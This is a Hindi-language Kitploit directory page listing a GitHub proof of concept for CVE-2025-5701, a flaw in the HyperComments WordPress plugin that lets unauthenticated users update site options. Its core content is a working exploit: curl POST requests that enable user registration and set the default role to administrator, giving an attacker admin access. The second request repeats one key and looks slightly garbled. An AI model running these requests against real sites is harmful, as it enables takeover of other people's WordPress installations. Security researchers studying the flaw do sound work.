Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-5701 — HyperComments <= 1.2.2 - Unauthenticated (Subscriber+) Arbitrary Options Update | Kitploit
उपकरण/GitHubGitHub/randomrobbiebf/cve-2025-5701
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगगलत कॉन्फ़िगरेशन
GitHubrandomrobbiebf/cve-2025-5701

CVE-2025-5701

HyperComments <= 1.2.2 - Unauthenticated (Subscriber+) Arbitrary Options Update

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-5701

HyperComments <= 1.2.2 - अप्रमाणित (सब्सक्राइबर+) मनमाना विकल्प अपडेट

विवरण

वर्डप्रेस के लिए HyperComments प्लगइन में डेटा के अनधिकृत संशोधन की अनुमति है जो 1.2.2 तक (और इसमें शामिल) सभी संस्करणों में hc_request_handler फ़ंक्शन में एक गुम क्षमता जांच के कारण विशेषाधिकार वृद्धि का कारण बन सकता है। इससे अप्रमाणित हमलावरों के लिए वर्डप्रेस साइट पर मनमाना विकल्प अपडेट करना संभव हो जाता है। इसका उपयोग पंजीकरण के लिए डिफ़ॉल्ट भूमिका को प्रशासक में अपडेट करने और उपयोगकर्ता पंजीकरण को सक्षम करने के लिए किया जा सकता है, ताकि हमलावर एक कमजोर साइट पर प्रशासनिक उपयोगकर्ता पहुंच प्राप्त कर सकें।

विवरण

  • प्रकार: plugin
  • स्लग: hypercomments
  • प्रभावित संस्करण: 1.2.2
  • CVSS स्कोर: 9.8
  • CVSS रेटिंग: गंभीर
  • CVSS वेक्टर: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2025-5701
  • स्थिति: बंद

प्रमाण अवधारणा

root@kitploit:~
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
  -d "data={\"users_can_register\":\"1\",\"default_role\":\"administrator\"}" \
  -H "Content-Type: application/x-www-form-urlencoded"
root@kitploit:~
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
  -d "data={\"users_can_register\":\"1\",\"users_can_register\":\"1\"}" \
  -H "Content-Type: application/x-www-form-urlencoded"
टूल डाउनलोड करें